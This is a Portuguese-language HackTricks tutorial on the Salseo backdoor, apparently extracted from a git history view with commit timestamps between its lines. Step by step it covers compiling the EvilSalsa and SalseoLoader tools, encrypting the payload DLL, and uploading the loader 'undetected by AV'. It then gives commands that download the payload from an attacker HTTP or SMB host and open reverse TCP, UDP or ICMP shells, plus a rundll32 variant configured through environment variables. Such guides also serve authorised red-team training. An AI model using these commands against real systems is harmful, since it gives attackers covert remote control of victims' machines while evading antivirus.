2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
2024-07-18 17:36:28 +00:00
{% hint style="success" %}
Aprenda e pratique Hacking AWS: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**Treinamento HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique Hacking GCP: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**Treinamento HackTricks GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 17:36:28 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-18 17:36:28 +00:00
< summary > Apoie o HackTricks< / summary >
2023-12-30 12:05:49 +00:00
2024-07-18 17:36:28 +00:00
* Verifique os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
2024-03-17 16:28:29 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-07-18 17:36:28 +00:00
* **Compartilhe truques de hacking enviando PRs para os repositórios** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 17:36:28 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2023-06-06 18:56:34 +00:00
## Compilando os binários
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Baixe o código-fonte do github e compile **EvilSalsa** e **SalseoLoader** . Você precisará do **Visual Studio** instalado para compilar o código.
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Compile esses projetos para a arquitetura do Windows onde você irá usá-los (Se o Windows suportar x64, compile-os para essa arquitetura).
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
Você pode **selecionar a arquitetura** dentro do Visual Studio na **aba "Build"** em ** "Platform Target".**
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
(\*\*Se você não encontrar essas opções, clique em ** "Project Tab"** e depois em ** "\<Nome do Projeto> Properties"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
Em seguida, compile ambos os projetos (Build -> Build Solution) (Dentro dos logs aparecerá o caminho do executável):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
## Preparar o Backdoor
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Primeiramente, você precisará codificar o **EvilSalsa.dll.** Para fazer isso, você pode usar o script python **encrypterassembly.py** ou pode compilar o projeto **EncrypterAssembly** :
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2023-12-30 12:05:49 +00:00
### Windows
2023-06-06 18:56:34 +00:00
```
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
2024-02-04 16:24:55 +00:00
Ok, agora você tem tudo o que precisa para executar todo o Salseo: o **EvilDalsa.dll codificado** e o **binário do SalseoLoader.**
2023-06-06 18:56:34 +00:00
2024-03-17 16:28:29 +00:00
**Faça o upload do binário SalseoLoader.exe para a máquina. Eles não devem ser detectados por nenhum AV...**
2023-06-06 18:56:34 +00:00
2024-02-04 16:24:55 +00:00
## **Executar a backdoor**
### **Obtendo um shell reverso TCP (baixando dll codificada através do HTTP)**
Lembre-se de iniciar um nc como ouvinte do shell reverso e um servidor HTTP para servir o EvilDalsa codificado.
2023-06-06 18:56:34 +00:00
```
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2024-07-18 17:36:28 +00:00
### **Obtendo um shell reverso UDP (baixando dll codificada através do SMB)**
2023-06-06 18:56:34 +00:00
2024-01-10 07:09:16 +00:00
Lembre-se de iniciar um nc como ouvinte do shell reverso e um servidor SMB para servir o evilsalsa codificado (impacket-smbserver).
2023-06-06 18:56:34 +00:00
```
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2023-12-30 12:05:49 +00:00
### **Obtendo um shell reverso ICMP (dll codificada já dentro da vítima)**
2023-06-06 18:56:34 +00:00
2024-07-18 17:36:28 +00:00
**Desta vez, você precisa de uma ferramenta especial no cliente para receber o shell reverso. Baixe em:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2023-06-06 18:56:34 +00:00
2023-08-15 18:30:18 +00:00
#### **Desativar Respostas ICMP:**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2024-02-04 16:24:55 +00:00
#### Executar o cliente:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2024-02-04 16:24:55 +00:00
#### Dentro da vítima, vamos executar o negócio do salseo:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2024-07-18 17:36:28 +00:00
## Compilando o SalseoLoader como DLL exportando a função principal
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Abra o projeto SalseoLoader usando o Visual Studio.
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
### Adicione antes da função principal: \[DllExport]
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
### Instale o DllExport para este projeto
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
#### **Ferramentas** --> **Gerenciador de Pacotes NuGet** --> **Gerenciar Pacotes NuGet para a Solução...**
2020-07-15 15:43:14 +00:00
2024-03-29 20:56:56 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
#### **Procure pelo pacote DllExport (usando a aba Procurar), e pressione Instalar (e aceite o popup)**
2020-07-15 15:43:14 +00:00
2024-03-17 16:28:29 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
Na pasta do seu projeto aparecerão os arquivos: **DllExport.bat** e **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
### **Desinstale o DllExport**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Pressione **Desinstalar** (sim, é estranho, mas confie em mim, é necessário)
2020-07-15 15:43:14 +00:00
2023-06-14 11:54:08 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### **Saia do Visual Studio e execute DllExport\_configure**
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
Apenas **saia** do Visual Studio
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Em seguida, vá para a sua **pasta do SalseoLoader** e **execute DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Selecione **x64** (se você for usá-lo dentro de um ambiente x64, que foi o meu caso), selecione **System.Runtime.InteropServices** (dentro de **Namespace para DllExport** ) e pressione **Aplicar**
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-06-06 18:56:34 +00:00
### **Abra o projeto novamente com o Visual Studio**
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
**\[DllExport]** não deve mais estar marcado como erro
2020-07-15 15:43:14 +00:00
2023-06-13 10:21:57 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
### Construa a solução
2020-07-15 15:43:14 +00:00
2023-08-15 18:30:18 +00:00
Selecione **Tipo de Saída = Biblioteca de Classes** (Projeto --> Propriedades do SalseoLoader --> Aplicativo --> Tipo de saída = Biblioteca de Classes)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
Selecione **plataforma x64** (Projeto --> Propriedades do SalseoLoader --> Compilar --> Destino da plataforma = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Para **construir** a solução: Build --> Build Solution (Dentro do console de saída aparecerá o caminho da nova DLL)
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
### Teste a DLL gerada
2020-07-15 15:43:14 +00:00
2024-07-18 17:36:28 +00:00
Copie e cole a DLL onde deseja testá-la.
2020-07-15 15:43:14 +00:00
Execute:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2023-06-06 18:56:34 +00:00
Se nenhum erro aparecer, provavelmente você tem uma DLL funcional!!
2020-07-15 15:43:14 +00:00
2023-12-30 12:05:49 +00:00
## Obter um shell usando a DLL
2020-07-15 15:43:14 +00:00
2024-02-04 16:24:55 +00:00
Não se esqueça de usar um **servidor HTTP** e configurar um **ouvinte nc**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Powershell
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2024-03-29 20:56:56 +00:00
### CMD
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2024-07-18 17:36:28 +00:00
{% hint style="success" %}
Aprenda e pratique AWS Hacking: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**Treinamento HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Aprenda e pratique GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**Treinamento HackTricks GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 17:36:28 +00:00
< details >
2023-12-30 12:05:49 +00:00
2024-07-18 17:36:28 +00:00
< summary > Suporte ao HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 17:36:28 +00:00
* Verifique os [**planos de assinatura** ](https://github.com/sponsors/carlospolop )!
2024-03-17 16:28:29 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-07-18 17:36:28 +00:00
* **Compartilhe truques de hacking enviando PRs para os repositórios** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 17:36:28 +00:00
{% endhint %}